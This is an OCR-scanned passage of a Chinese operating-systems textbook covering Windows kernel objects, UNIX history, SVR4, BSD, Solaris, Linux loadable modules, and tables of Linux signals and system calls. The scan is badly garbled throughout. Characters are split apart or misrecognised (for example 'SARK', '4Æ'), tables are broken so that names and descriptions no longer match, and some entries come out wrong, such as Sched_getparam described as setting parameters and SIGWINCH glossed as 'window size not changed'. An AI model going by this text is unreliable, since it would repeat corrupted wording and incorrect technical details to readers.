异步 过 程 调用 用 于 打 断 一 个 特定 线程 的 执行 ， 以 一 种 特定 的 处 理 器 模式 调用 过 程 
延迟 过 程 调用 用 于 延迟 中 断 处 理 ， 以 避免 延迟 中 断 硬件 处 理 。 也 可 以 用 于 实现 定时 器 和 进程 间 通 信 
通过 中 断 分 派 表 IDT ( Interrupt Dispatch Table) 中 的 项 ， 把 中 断 源 连 接 到 中 断 服务 例 程 上 。 每 
中 断 个 处 理 器 有 一 个 IDT， 用 于 分 发 该 处 理 器 中 发 生 的 中 斯 
表示 虚 地 址 空间 和 一 组 线程 对 象 执行 时 所 需要 的 控制 信息 。 一 个 进程 包括 指向 地 址 映射 的 指 
进程 H, 包含 线程 对 象 的 一 列 就 绪 线 程 、 属 于 进程 的 一 列 线 程 、 在 进程 中 执行 的 所 有 线程 的 累加 时 间 
和 基本 优先 级 
线程 表示 线程 对 象 ， 包 括 调度 优先 权 和 数量 ,以 及 该 运行 在 哪个 处 理 器 上 
分 布 图 用 于 衡量 一 块 代 码 中 的 运行 时 间 分 布 。 用 户 代 码 和 系统 代码 都 可 以 建立 分 布 图 
2.6 ”传统 的 UNIX 系统 
2.6.1 历史 


UNIX 的 历史 是 一 个 经 常 谈论 到 的 神话 ， 这 里 就 不 再 重复 了 ， 而 是 提供 一 个 简单 的 概述 。 
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UNIX 最 初 是 在 贝尔 实验 室 开发 的 ，1970 年 在 PDP-7 上 开始 和 运行。 贝尔 实验 室 的 部 分 人 员 
参与 了 MIT 的 MAC 项 目 中 的 分 时 工作 。 这 个 项 目 导致 开发 了 第 一 个 CTSS, 然后 是 Multics。 尽 
管 通常 说 UNIX 是 Multics 的 一 个 缩小 了 的 版 本 ， 但 是 ， 实 际 上 UNIX 的 开发 者 声称 更 多 地 受到 
CTSS 的 影响 [RITC78 ]。 尽 管 如 此 ，UNIX 吸收 了 Multics 的 许多 思想 。 
在 贝尔 实验 室 , 以 及 后 来 其 他 地 方 关于 UNIX 的 工作 产生 了 一 系列 的 UNIX 版 本 。 第 一 个 著 
名 的 里 程 碑 是 把 UNIX 系统 从 PDP-7 上 移植 到 PDP-11 E, 第 一 次 暗示 了 UNIX 将 成 为 所 有 计算 
机 上 的 操作 系统 ;下 一 个 重要 的 里 程 碑 是 用 C 语言 重 写 UNIX ,这 在 当时 是 一 个 前 所 未 闻 的 策略 。 
通常 人 们 认为 像 操 作 系 统 这 样 需要 处 理 时 间 限 制 事件 的 复杂 系统 , 必须 完全 用 汇编 语言 编写 。 产 
生 这 种 看 法 的 原因 如 下 : 
o 按照 今天 的 标准 ， 内 存 (包括 RAM 和 二 级 存储 器 ) 容量 小 且 价 格 贵 ， 因 此 高 效 使 用 内 
存 很 重要 。 这 就 包括 了 不 同 的 内 存 覆 盖 (overlay ) 技术 ， 如 使 用 不 同 的 代码 段 和 数据 段 ， 
以 及 自修 改 代 码 。 

@ 尽管 自 20 世纪 50 年 代 起 就 开始 使 用 编译 器 ， 计 算 机 业 一 直 对 自动 生成 的 代码 的 质量 持 
有 怀疑 。 在 资源 空间 很 小 的 情况 下 ， 时 间 上 和 空间 上 都 高 效 的 代码 就 很 有 必要 了 。 

@ 处 理 器 和 总 线 速度 相对 较 慢 ， 因 此 ， 节 省 时 钟 周 期 会 使 得 运行 时 间 上 有 很 大 的 改进 。 

C 语言 实现 证 明了 对 大 部 分 而 不 是 全 部 系统 代码 使 用 高 级 语言 的 优点 。 现 在 , 实际 上 所 有 的 
UNIX 实现 都 是 用 C 语言 编写 的 。 

这 些 UNIX 的 早期 版 本 在 贝尔 实验 室 中 是 非常 流行 的 。1974 F, UNIX 系统 第 一 次 出 现在 一 
本 技术 期 刊 中 [ RITC74 ]， 这 大 大 地 激发 了 人 们 对 该 系统 的 兴趣 UNIX 的 许可 证 提供 给 了 商业 
机 构 和 大 学 。 第 一 个 在 贝尔 实验 室外 可 以 使 用 的 版 本 是 1976 年 的 第 6 版 , 接着 1978 年 发 行 的 第 
7 版 是 大 多 数 现代 UNIX 系统 的 先驱 。 最 重要 的 非 AT&T 系统 是 加 利 福 尼 亚 大 学 伯克利 分 校 开 发 
的 UNIX BSD, 最 初 在 PDP 上 运行 , 后 来 在 VAX 机 上 运行 。AT&T 继续 开发 改进 系统 ,1982 Æ, 
贝尔 实验 室 将 UNIX 的 多 个 AT&T 变种 合并 成 一 个 系统 ， 即 商业 销售 的 UNIX System Il, BK 
在 操作 系统 中 又 增加 了 很 多 功能 组 件 ， 产 生 了 UNIX Sytem Vo 


2.6.2 描述 


图 2.14 给 出 了 对 UNIX 结构 的 概述 。 底 层 硬件 被 操作 系统 软件 包围 ， 操 作 系 统 通 常 称 做 系 
SARK, 或 简单 地 称 做 内 核 ， 以 强调 它 与 用 户 和 应 用 程序 的 隔离 。 本 书 中 举 的 UNIX 的 例子 , 主 
要 关注 的 是 UNIX AK. 但 是 , UNIX 拥有 许多 用 户 服 务 和 接口 , 它们 也 被 看 做 是 系统 的 一 部 分 ， 
可 以 分 为 命令 解释 器 、 其 他 接口 软件 和 C 编译 器 部 分 ( 编译 器 、 汇 编 器 和 加 载 器 )， 它们 的 外 层 
由 用 户 应 用 程序 和 到 C 编译 器 的 用 户 接口 组 成 。 

图 2.15 提供 了 对 内 核 的 更 深入 描述 。 用 户 程 序 可 以 直接 调用 操作 系统 服务 ， 也 可 以 通过 库 
程序 调用 。 系 统 调用 接口 是 内 核 和 用 户 的 边界 , 它 允 许 高 层 软件 使 用 特定 的 内 核 函 数 。 另 一 方面 ， 
操作 系统 包含 直接 与 硬件 交互 的 原子 例 程 (primitive routine )。 在 这 两 个 接口 之 间 ， 系 统 被 划分 
成 两 个 主要 部 分 ， 一 个 关心 进程 控制 ， 另 一 个 关心 文件 管理 和 IO。 进 程控 制 子 系统 负责 内 存 管 
理 、 进 程 的 调度 和 分 发 、 进 程 的 同步 以 及 进程 间 的 通信 。 文件 系统 按 字符 流 或 块 的 形式 在 内 存 和 
外 部 设备 间 交 换 数 据 ， 为 实现 这 一 点 , 需要 用 到 各 种 设备 驱动 程序 。 对 面向 块 的 传送 ,使 用 磁盘 
高 速 缓存 方法 : 内 存 中 的 一 个 系统 缓冲 区 介 于 用 户 地 址 空间 和 外 部 设备 之 间 。 

本 节 描 述 的 是 传统 的 UNIX RA, [ VAHA96 ] 使 用 这 个 术语 表示 System V 版 本 3 (简称 
SVR3 )、4.3BSD 以 及 更 早 的 版 本 。 下 面 是 关于 传统 UNIX 系统 的 综述 : 它 被 设计 成 在 单一 处 理 
器 上 运行 ,缺乏 保护 其 数据 结构 避免 被 多 个 处 理 器 同时 访问 的 能 力 ; 它 的 内 核 不 是 通用 的 ， 只 支 
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持 一 种 文件 系统 、 进 程 调度 策略 和 可 执行 文件 格式 。 传 统 UNIX 的 内 核 没有 设计 成 可 扩展 的 ， 几 
乎 没有 代码 重用 的 设施 。 其 结果 是 ， 当 往 不 同 的 UNIX 版 本 中 增加 新 功能 时 ,必须 增加 很 多 新 的 
代码 ， 因 而 产生 了 一 个 膨胀 的 、 非 模块 化 的 内 核 。 


用 户 程序 


进程 间 通 信 





硬件 级 





图 2.14 UNIX 的 一 般 体系 结构 | 图 2.15 传统 UNIX 内 核 
2.7 WÈ UNIX 系统 
随 着 UNIX 的 发 展 ， 出 现 了 很 多 不 向 的 实现 版 本 ， 每 种 实现 版 本 都 提供 了 二 些 有 用 的 功能 。 
这 就 需要 产生 一 种 新 的 实现 版 本 ， 以 合并 许多 重要 的 技术 革新 ， 增加 其 他 现代 操作 系统 设计 特征 ， 
创造 出 一 种 模块 化 更 好 的 结构 。 典 型 的 现代 UNIX 内 核 具 有 如 图 2.16 所 示 的 结构 。 有 有 一 个 小 的 
核心 软件 ， 它 以 模块 化 的 风格 编写 ， 提供 许多 操作 系统 进程 所 需要 的 功能 和 服务 ; 每 个 外 部 圆圈 


表示 相应 的 功能 和 以 多 种 方式 实现 的 接口 。 
下 面 给 出 现代 UNIX 系统 的 一 些 例子 。 


2.7.1 系统 V 版 本 4 ( SVR4 ) 


H AT&T HI Sun Microsystem 联合 开发 的 SVR4 结 合 了 SVR3.4.3BSD, Microsoft Xenix System 
V 和 SunOS 的 特点 。 它 几乎 完全 重 写 了 系统 V 的 内 核 ， 产生 了 一 个 简洁 的 、 有 些 复 杂 的 实现 版 
本 。 这 个 版 本 中 的 新 特点 包括 对 实时 处 理 的 支持 、 Me SARRA. 虚拟 内 存 管 
理 、 虚 拟 文件 系统 和 可 以 剥夺 的 内 核 。 

.SVR4 同时 汲取 了 商业 设计 震 和 学 院 设 计 者 的 成 果 ， 为 商业 UNIX 的 部 堵 提 供 统一 的 平台 o 
它 已 经 实现 了 这 个 目标 , 是 现 有 的 最 重要 的 UNIX EA CST EE UNIR 系 统 中 曾经 开发 
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过 的 大 多 数 重要 特征 , 并 以 一 种 完整 的 、 有 商业 生存 力 的 方式 实现 这 些 特征 。 SVR4 可 以 在 从 32 
位 微 处 理 器 到 超级 计算 机 的 很 广 范围 内 的 处 理 器 上 运行 。 





网 络 驱 动 tty 驱动 
图 2.16 现代 UNIX 内 核 
2.7.2 BSD- 


UNIX 版 本 的 BSD ( Berkeley Software Distribution ) AIIM RAH RR 中 扮演 
着 重要 的 角色 。4.xBSD 广泛 用 于 学 院 版 的 UNIX 系统 ， 并 且 成 为 许多 商业 UNIX 产品 的 基础 。 
可 以 肯定 地 说 ，BSD 对 UNIX 的 普及 起 着 主要 作用 ， 大 多 数 UNIX RE BSD 
版 本 中 。 

4.4BSD 是 Berkeley 最 后 发 布 的 BSD 版 本 ， 随后 其 设计 和 实现 组 织 就 解散 了 。 4 它 是 4.3BSD 
的 一 个 重要 升级 ,包含 新 的 虚拟 内 存 系统 、 对 内 核 结构 所 做 的 改变 以 及 对 一 -系列 其 他 特征 的 增强 。 

应 用 最 为 广泛 的 且 文 档 最 好 的 一 个 BSD 版 本 是 FreeBSD。FreeBSD 在 基于 因特网 的 服务 器 

和 防火 墙 中 最 常用 到 ， 还 应 用 在 许多 艇 人 式 系 统 中 。 

最 新 版 本 的 Macintosh 操作 系统 Mac OS X 是 基于 FreeBSD 5.0 和 Mach 3.0 OMAR 3 


2.7.3 Solaris 10 


Solaris 是 Sun 基于 SVR4 的 UNIX 版 本 ， 最 新 版 本 是 10。Solaris 的 实现 提供 了 SVR4 的 所 
有 特征 以 及 许多 更 高 级 的 特征 ， 如 完全 可 抢占 、 支 持 多 线程 的 内 核 、 完 全 支持 SMP 以 及 文件 系 
统 的 面向 对 象 接口 。Solaris 是 使 用 最 为 广泛 、 最 成 功 的 商业 UNIX 实现 版 本 。 


2.8 Linux 操作 系统 


Windews/Linux 比较 
Windows Vista 、 


商业 操作 系统 ， 受 到 VAX/VMS 的 巨大 影响 ， 要 求 与 多 个 一 种 DRS Hee 注重 简单 和 效率 ， 可 运行 ” 
HERIR, 比如 DOS/Windows、POSIX 以 及 最 初 的 6S12 | 在 多 种 处 外 器 架构 上 ` 1 
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〈 续 ) 


影响 基础 设计 决策 的 环境 


32 位 程序 地 址 空间 
MB 级 物理 内 存 
虚拟 内 存 

多 处 理 器 (4 路 ) 
基于 W/O 设备 的 微 控 制 器 
客户 /服务 器 分 布 式 计算 
大 量 、 多 样 的 用 户 群 
与 当今 环境 比较 : 
64 位 地 址 

GB 级 物理 内 存 
虚拟 内 存 、 虚 拟 处 理 器 

多 处 理 器 (64~ 128 ) 

高 速 互 联网 /内 部 网 、Web 服务 
单 用 户 ， 易 受 世 界 各 地 的 黑客 攻击 








16 位 程序 地 址 空间 
KB 级 物理 内 存 
基于 内 存 映射 的 交换 系统 
单 处 理 器 

基于 IO 设备 的 状态 机 
独立 交互 系统 
少量 友好 的 用 户 





尽管 Windows 和 Linux 都 在 不 断 适 应 环境 并 做 出 改变 ， 但 是 初始 设计 环境 ( 也 就 是 在 1989 年 和 1973 年 ) 还 是 严 


重 影响 了 其 设计 选择 : 

并 发 单元 : 线程 与 进程 

进程 创建 CreateProcess()49 fork() 
LO: 异步 与 同步 


安全 性 : ”自由 访问 与 uid/gid [用 户 群 ] 


系统 结构 


模块 化 内 核 ， 通 过 组 件 显 式 发 布 数据 结构 和 接口 

三 层 ; 

e 硬件 抽象 层 管理 处 理 器 、 中 断 和 DMA, BIOS 详细 信息 
se 内 核 层 管理 CPU 调度 、 中 断 和 同步 

。 执行 体 层 在 完全 线程 化 、 通 常 是 抢占 式 的 环境 中 实现 操 

作 系 统 的 主要 功能 

动态 数据 结构 和 内 核 地 址 空间 组 织 ; 初始 化 代码 在 启动 后 
被 抛弃 。 大 部 分 内 核 代码 和 数据 是 可 分 页 的 。 不 可 分 页 的 内 
核 代 码 和 数据 采用 大 页 面 ， 以 提高 TLB 效率 。 

文件 系统 、 网 络 、 设 备 是 可 加 载 /不 可 加 载 的 驱动 程序 ( 动 
态 链接 库 ) ， 使 用 可 扩展 的 MO 系统 接口 

动态 加 载 的 驱动 程序 可 以 提供 可 分 页 和 不 可 分 页 的 区 域 
名 字 空 间 的 根 目录 是 虚拟 的 ,文件 系统 挂 载 在 下 面 ; 可 以 
很 容易 地 扩展 系统 对 象 类 型 ， 影 响 统 一 命名 、 引 用 、 生 命 周 
期 管理 、 安 全 性 和 基于 句柄 的 同步 


OS 个 性 化 作为 用 户 态 子 系统 实现 。 原 生 NT API 基于 通 
用 内 核 句 柄 /对 象 架 构 并 允许 跨 进程 操作 虚拟 内 存 、 线 程 和 其 
他 内 核对 象 


自由 访问 控制 、 分 散 的 特权 、 审 计 
28.1 历史 


{ 地 址 空间 ， 单 处 理 器 ] 
[地 址 空间 ， 交 换 操作 ] 
(ERE, VO 设备 ] 


单 体内 核 


内 核 代 码 和 数据 被 静态 分 配给 不 可 分 页 内 存 


对 加 载 /外 载 内 核 模块 的 广泛 支持 ， 比 如 设备 驱动 
程序 和 文件 系统 
模块 不 能 被 分 页 ， 但 是 可 以 外 载 


名 字 空 间 根 目录 位 于 文件 系统 中 ;添加 新 命名 的 系 
统 对 象 需要 文件 系统 更 改 或 映射 到 设备 模型 上 实现 
了 与 POSIX 兼容 的 类 似 UNIX WHO; 内 核 API E 
Windews 的 API 简单 得 多 ; 能 够 理解 各 种 类 型 的 可 
执行 文件 

用 户 / 组 ID; 类 似 NT 特权 的 权能 与 进程 关联 


Linux 开始 是 用 于 IBM PC ( Intel 80386 ) 结构 的 一 个 UNIX 变种 ,最初 的 版 本 是 由 芬兰 一 名 
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计算 机 科学 专业 的 学 生 Linus Torvalds 3A. 1991 4Æ Torvalds 在 Internet 上 公布 了 最 早 的 Linux 
版 本 ， 从 那 以 后 ， 很 多 人 通过 在 Internet 上 的 合作 ， 为 Linux 的 发 展 做 出 了 贡献 ， 所 有 这 些 都 在 
Torvalds 的 控制 下 。 由 于 Linux 是 自由 的 , 并 且 可 以 得 到 源 代码 ， 因 而 它 成 为 其 他 诸如 sun 公司 
和 IBM 公司 提供 的 UNIX 工作 站 的 较 早 的 替代 产品 。 当 今 ,Linux 是 具有 全 面 功 能 的 UNIX 系统 ， 
可 以 在 所 有 这 些 平 台 甚 至 更 多 平台 上 运行 ,包括 Intel Pentium 和 Itanium.Motorola/IBM PowerPC, 

Linux 成 功 的 关键 在 于 它 是 由 自由 软件 基金 会 Free Software Foundation, FSF) 赞助 的 自由 
软件 包 。FSF 的 目标 是 稳定 的 、 与 平台 无 关 的 软件 ， 它 必须 是 自由 的 、 高 质量 的 、 为 用 户 团体 所 
接受 的 。FSF 的 GNU 项 目 9 为 软件 开发 者 提供 了 工具 ， 而 GNU Public License (GPL) 是 FSF 
批准 标志 . Torvalds 在 开发 内 核 的 过 程 中 使 用 了 GNU 工具 ,后 来 他 在 GPL 之 下 发 布 了 这 个 内 核 。 
这 样 ， 我 们 今天 所 见 到 的 Linux 发 行 版 本 是 FSF 的 GNU WA. Torvald 的 个 人 努力 以 及 遍布 世 
界 的 很 多 合作 者 们 共同 的 产品 。 

除了 由 很 多 个 程序 员 使 用 以 外 ，Linux 已 经 明显 地 渗透 到 了 业界 ， 这 并 不 是 因为 自由 软件 的 
缘故 ,而 是 因为 Linux 内 核 的 质量 。 很 多 天 才 的 程序 员 对 当前 版 本 都 有 贡献 ,产生 了 这 一 在 技术 
上 给 人 留 下 深刻 印象 的 产品 ; 而 且 ，Linux 是 高 度 模 块 化 和 易于 配置 的 ， 这 使 得 它 很 容易 在 各 种 
不 同 的 硬件 平台 上 显示 出 最 佳 的 性 能 ; 另外 , 由 于 可 以 获得 源 代 码 , 销售 商 可 以 调整 应 用 程序 和 
使 用 方法 以 满足 特定 的 要 求 。 本 书 将 提供 基于 最 新 的 Linux 2.6 版 本 的 内 核 的 细节 。 


2.8.2 ”模块 结构 


大 多 数 UNIX 内 核 是 单 体 的 。 前面 已 经 讲 过 , 单 体内 核 是 指 在 一 大 块 代码 中 实际 上 包含 了 所 
有 操作 系统 功能 , 并 作为 一 个 单一 进程 运行 ,具有 唯一 地 址 空间 。 内 核 中 的 所 有 功能 部 件 可 以 访 
问 所 有 的 内 部 数据 结构 和 例 程 。 如 果 对 典型 的 单 体式 操作 系统 的 任何 部 分 进行 了 改变 , 在 变化 生 
效 前 ， 所 有 的 模块 和 例 程 都 必须 重新 链接 、 重 新 安装 ,系统 必 须 重新 启动 。 其 结果 是 ,任何 修改 
《如 增加 一 个 新 的 设备 驱动 程序 或 文件 系统 函数 ) 都 是 很 困难 的 。 这 个 问题 在 Linux 中 尤其 尖锐 ， 
Linux 的 开发 是 全 球 性 的 ， 是 由 独立 的 程序 员 组 成 的 联系 松散 的 组 织 完成 的 。 

尽管 Linux 没有 采用 微 内 核 的 方法 , 但 是 由 于 它 特殊 的 模块 结构 , 也 具有 很 多 微 内 核 方法 的 
优点 。Linux 的 结构 是 一 个 模块 的 集合 ， 这 些 模块 可 以 根据 需要 自动 地 加 载 和 和 印 载 。 这 些 相 对 独 
立 的 块 称 做 可 加 载 模块 (loadable module ) [ GOYE99 ]。 实 质 上 ， 一 个 模块 就 是 内 核 在 运行 时 可 
以 链接 或 断 开 链接 的 一 个 对 象 文件 。 典 型 地 ， 一 个 模块 实现 一 些 特定 的 功能 ， 例 如 文件 系统 、 设 
备 驱动 或 是 内 核 上 层 的 一 些 特征 。 尽管 模块 可 以 因为 各 种 目的 而 创建 内 核 线 程 , 但 是 它 不 作为 自 
身 的 进程 或 线程 执行 。 当 然 ， 模 块 会 代表 当前 进程 在 内 核 态 下 执行 。 

因此 ,虽然 Linux 被 认为 是 单 体 内 核 , 但 是 它 的 模块 结构 克服 了 在 开发 和 发 展 内 核 过 程 中 所 
遇 到 的 困难 。 

Linux 可 加 载 模块 有 两 个 重要 特征 : 

@ 动态 链接 ， 当 内 核 已 经 在 内 存 中 并 正在 运行 时 ， 内 核 模块 可 以 被 加 载 和 链接 到 内 核 。 模 

块 也 可 以 在 任何 时 刻 被 断 开 链接 ， 从 内 存 中 移出 。 
o 可 堆栈 模块 : 模块 按 层次 排列 ， 当 被 高 层 的 客户 模块 访问 时 ， 它 们 作为 库 ; 当 被 低层 模 
块 访问 时 ， 它 们 作为 客户 。 

动态 链接 [ FRAN97 ] 简化 了 配置 任务 ， 节 省 了 内 核 所 占 的 内 存 空间 。 在 Linx 中 ， 用 户 程 
序 或 用 户 可 以 使 用 insmod 和 rmmod 命令 显 式 地 加 载 和 外 载 内 核 模块 , 内 核 自 身 监 视 对 于 特定 天 
数 的 需求 ,并 可 以 根据 需求 加 载 和 印 载 模块 。 通过 可 堆栈 模块 可 以 定义 模块 间 的 依赖 关系 ,这 有 


© GNU 是 GNU’s Not UNIX 的 首 字母 简写 。GNU 项 目 是 一 系列 免费 的 软件 ， 包 括 为 开发 类 UNIX 操作 系统 的 软 
件 包 和 工具 ， 它 常常 使 用 Linux 内 核 。 
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两 个 好 处 : 
1) 对 一 组 相似 的 模块 的 相同 的 代码 (例如 相似 硬件 的 驱动 程序 ) 可 以 移 人 一 个 模块 ， 以 减 
少 重复 。 
2) 内 核 可 以 确保 所 需要 的 模块 都 存在 ， 和 避免 印 载 其 他 正在 运行 的 模块 仍然 依赖 着 的 模块 ， 
并 且 当 加 载 一 个 新 模块 时 ， 加 载 任何 所 需要 的 附加 模块 。 
图 2.17 举例 说 明了 Linux 管理 模块 的 结构 ， 该 图 显示 了 当 只 有 两 个 模块 FAT T 和 VFAT 被 加 
载 后 内 核 模 块 的 列表 。 每 个 模块 由 两 个 表 定 义 ， 即 模块 表 和 符号 表 。 模 块 表 包 括 以 下 元 素 ， 
© *next: 指向 后 面 的 模块 。 所 有 模块 被 组 织 到 一 个 链表 中 , 链表 以 一 个 伪 模 块 开始 ( 图 2.17 
中 没有 显示 )。 
*name: 指向 模块 名 的 指针 。 
size: 模块 大 小 ， 以 内 存 页 计 。 
usecount: 模块 引用 计数 器 。 当 操作 系统 引用 的 模块 函数 开始 时 计数 器 增加 , 终止 时 减少 。 
flags: 模块 标志 。 
nsyms， 输 出 的 符号 数 。 
ndeps: 引用 的 模块 数 。 
*syms: 指向 这 个 模块 符号 表 的 指针 。 
*deps: 指向 被 这 个 模块 引用 的 模块 列表 的 指针 。 
@ *refs: 指向 使 用 这 个 模块 的 模块 列表 的 指针 。 
符号 表 定 义 了 该 模块 控制 的 符号 ， 它 们 将 在 别 的 地 方 使 用 到 。 
图 2.17 显示 了 VFAT 模块 在 FAT 模块 后 被 加 载 ， 并 且 它 依赖 于 FAT 模块 。 





图 2.17 Linux 内 核 模块 列表 示例 


2.8.3 ”内 核 组 件 

图 2.18 摘自 [MOSB02] 有 显示 了 基于 IA-64 体系 结构 ( 例如 Intel Itanium ) 的 Linux 内 核 的 主 
要 组 件 。 图 中 显示 了 运行 在 内 核 之 上 的 一 些 进程 ， 每 个 方 框 表示 一 个 进程 ， 每 条 带 箭 头 的 曲线 表 
示 一 个 正在 执行 的 线程 9 。 内 核 本 身 包 括 一 组 相互 关联 的 组 件 ， 箭头 表示 主要 的 关联 。 底 层 的 硬 


@ 昌 在 Linux 中 ， 进 程 与 线程 的 概念 相同 。 但 是 ，Linux 中 的 多 线程 可 以 按 这 样 一 种 方法 来 有 效 地 组 合 在 一 起 ， 即 
单个 进程 由 多 个 线程 组 成 。 这 些 内 容 将 在 第 4 章 中 详细 探讨 。 
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件 也 是 一 个 组 件 集 ， gc 当然 所 有 的 内 核 组 件 都 在 
CPU 上 执行 ， 但 是 为 了 简洁 ， 没 有 显示 它们 的 关系 。 





图 2.18 Linux 内 核 组 件 


主要 的 内 核 组 件 简要 介绍 如 下 : 


信 


信号 : 内 核 通 过 信和 号 通知 进程 。 例 如 ， 信 和 号 用 来 通知 进程 某 些 错误 ， 比 如 被 0 除 错 误 。 
表 2.6 给 出 了 一 些 信 号 的 例子 。 

系统 调用 : 进程 是 通过 系统 调用 来 请 求 系统 服务 的 。 一 共有 几 百 个 系统 调用 ， 可 以 粗略 
地 分 为 6 类 : 文件 系统 、 进 程 、 调 度 、 进 程 间 通信 ， 套 接 字 ( 网 络 ) 和 其 他 。 表 2.7 分 
别 给 出 了 每 个 类 的 一 些 例子 。 

进程 和 调度 器 : 创建 、 管 理 和 调度 进程 。 

RWAF: 为 进程 分 配 和 管理 虚拟 内 存 。 

MERE: 为 文件 、 自 录 和 其 他 文件 相关 的 对 象 提供 一 个 全 局 的 、 分 层次 的 命名 空间 ， 
还 提供 文件 系统 函数 。 

网 络 协议 ;为 用 户 的 TCP/IP 协议 套件 提供 套 接 字 接 口 。 

字符 设备 驱动 : 管理 向 内 核 一 次 发 送 或 接收 一 个 字 节 数据 的 设备 ， 比 如 终端 、 调 制 解 调 
器 和 打印 机 。 

块 设备 驱动 : 管理 以 块 为 单位 向 内 核发 送 和 接收 数据 的 设备 ， 比 如 各 种 形式 的 外 存 ( 磁 
Æ. CD-ROM 等 )。 

网 络 设备 驱动 : 对 网 络 接口 卡 和 通信 端口 提供 管理 ， ELE a eee eae 
网 络 设备 。 

陷阱 和 错误 : 处 理 CPU 产生 的 陷阱 和 错误 ， 例 如 内 存 错 误 。 

物理 内 存 : 管理 实际 内 存 中 的 内 存 页 池 和 为 炭 拟 内 存 分 配 内 存 页 。 

中 断 : 处 理 来 自 外 设 的 中 断 。 


表 2:6 一 些 Linux 信号 
号 说 明 i 号 说 明 


SIGHUP 终端 挂 起 SIGCONT 继续 
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SIGQUIT SIGTSTP 

















SIGTRAP 跟踪 陷阱 SIGTTOU 终端 写 

SIGBUS 总 线 错误 SIGXCPU 超出 CPU 限制 
SIGKILL Kill 信和 号 SIGVTALRM 虚拟 告警 器 时 钟 
SIGSEGV 段 错误 SIGWINCH 窗口 大 小 没有 改变 
SIGPIPT 坏 的 管道 SIGPWR 电源 错误 
SIGTERM 终止 SIGRTMIN 第 一 个 实时 信号 


SIGCHLD 








SIGRTMAX 最 后 一 个 实时 信和 号 


表 2.7 一 些 Linux 系统 调用 





文件 系统 相关 









关闭 文件 描述 符 
为 文件 起 新 名 
打开 或 者 创建 一 个 文件 或 设备 
从 文件 描述 符 中 读 

往 文 件 描述 符 中 写 








link 



























































进程 相关 
execve 执行 程序 
exit 终止 调用 的 进程 
getpid 获得 进程 标志 
setuid 设置 当前 进程 的 用 户 标志 
prirace 为 父 进程 提供 一 种 方法 ， 使 之 可 以 监视 和 控制 另 一 个 进程 的 执行 ， 并 且 检 查 和 修改 
它 的 核心 映像 和 寄存 器 
调度 相关 
Sched_getparam 根据 进程 的 标志 pid 设置 与 调度 策略 相关 的 调度 参数 


























Sched_get_priority_max 返回 最 大 的 优先 级 值 ， 这 个 值 可 能 被 用 于 由 policy 确定 的 调度 算法 
根据 进程 pid 设置 调度 策略 ( 如 FIFO) 和 相关 参数 
根据 进程 pid 把 轮转 时 间 量 写 人 到 timespec 结构 中 ， 这 个 结构 由 参数 tp 表示 


通过 这 个 系统 调用 ， 一 个 进程 可 以 自动 地 释放 处 理 器 。 这 个 进程 将 会 因为 静态 优先 








Sched_setscheduler 














Sched_rr_get_interval 

















































Sched_yield _ 
级 被 移动 到 队列 尾部 ， 同 时 一 个 新 的 进程 开始 运行 
进程 间 通 依 (IPC) 相关 
msgrev 为 接收 消息 分 配 的 消息 缓冲 结构 。 系 统 调用 根据 msqid 把 一 个 消息 从 消息 队列 读 取 
到 新 创建 的 消息 缓冲 区 中 
semctl 根据 cmd 对 信号 量 集 semid 执行 控制 操作 
semop 对 信和 号 量 集 semid 选 定 的 成 员 执行 操作 
shmat 把 由 shmid 标识 的 共享 内 存 段 附加 到 调用 进程 的 数据 段 








允许 用 户 用 一 个 共享 的 内 存 段 接收 信息 ,设置 共享 内 存 段 的 所 有 者 、 组 和 权限 ， 或 
者 销毁 一 个 段 


shmctl 











FRF (MA) 相关 
为 套 接 字 分 配 一 个 本 地 的 IP 地 址 和 端口 ， 成 功 返 回 0， 失 败 返 回 -1 
在 给 定 的 套 接 字 和 远程 套 接 字 间 建立 连接 ， 远 程 套 接 字 需 要 与 套 接 字 地 址 相关 联 
返回 本 地 主机 名 称 
把 *msg 指向 的 缓冲 区 中 数据 按 字 节 发 送 给 定 的 套 接 字 
设置 套 接 字 属性 











connect 








gethostname 







setsockopt 
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其 他 
试图 创建 一 个 可 加 载 的 模块 人口 ， 为 加 载 这 个 模块 预定 所 需 的 内 核 内 存 空间 
把 文件 中 的 所 有 核心 部 分 复制 到 硬盘 中 ,并且 等 待 设备 报告 所 有 的 部 分 都 被 写 入 到 
存储 器 中 


查询 内 核 中 可 加 载 模块 相关 的 信息 
返回 从 1970 年 1 月 1 日 起 的 时 间 ， 以 秒 为 单位 
在 当前 终端 模拟 挂 起 操作 。 这 个 调用 在 其 他 用 户 登录 时 提供 一 个 “干净 ”的 tty 


2.9 推荐 读物 和 网 站 


[BRIN01] 收 集 了 近年 来 关于 操作 系统 主要 进展 的 优秀 论文 。 [SWAI07] 是 一 篇 有 趣 的 关于 未 来 操作 系统 
的 短文 。 
| VAHA96 | 是 讲述 UNIX 内 部 结构 的 一 本 优秀 书籍 ， 它 提供 了 很 多 UNIX 变种 间 的 比较 。[ GOOD94 | 
提供 了 关于 UNIX SVR4 的 丰富 的 技术 细节 .对 于 流行 的 开源 FreeBSD, [MCKU05] 值 得 强烈 推荐 .[MCDO07] 
较 好 地 讲述 了 Solaris 内 部 结构 。[BOVE06] 和 [LOVE05] 是 讲述 Linux 内 部 结构 的 两 本 好 书 。 
尽管 有 很 多 关于 Windows 各 种 版 本 的 书 ， 但 是 于 内 部 结构 相关 的 内 容 却 非常 少 。 要 推荐 的 书 是 
[RUSS05]， 它 的 内 容 只 涵盖 了 Windows Server 2003 的 内 容 ， 但 大 部 分 内 容 对 Vista 也 是 正确 的 。 
BOVE06 Bovet,D.,and Cesati,M. Understanding the Linux Kernel.Sebastopol, CA: O’Reilly,2006. 
BRINO1 Brinch Hansen,P. Classic Operating Systems:From Batch Processing to Distributed Systems. New 










create_module 





Fsyne 





query_module 





time 





vhangup 





York:Springer-Verlag,2001. 

GOOD94 Goodheart,B.,and Cox,J.The Magic Garden Explained:The Internals of UNIX System V Release 
4.Englewood Cliffs,NJ:Prentice Hall,1994. 

LOVE0S Love,R.Linux Kernel Development.Waltham,MA:Novell Press,2005. 

MCDO07 McDougall,R.,and Mauro,J.Solaris Internals:Solaris 10 and OpenSolaris Kernel Architecture. 
Palo Alto,CA:Sun Microsystems Press,2007. 

MCKUOS McKusick,M.,and Neville-Neil,J.7he Design and Implementation of the FreeBSD Operating 
System.Reading,MA:Addison-Wesley,2005. 

RUSS05 Russinovich,M.,and Solomon,D.Microsoft Windows Internals:Microsoft Windows Server (TM ) 
2003, Windows XP and Windows 2000.Redmond,WA:Microsoft Press,2005. 

SWAI07 Swaine,M.““Wither Operating Systems?”Dr Dobbs Journal,March 2007. 

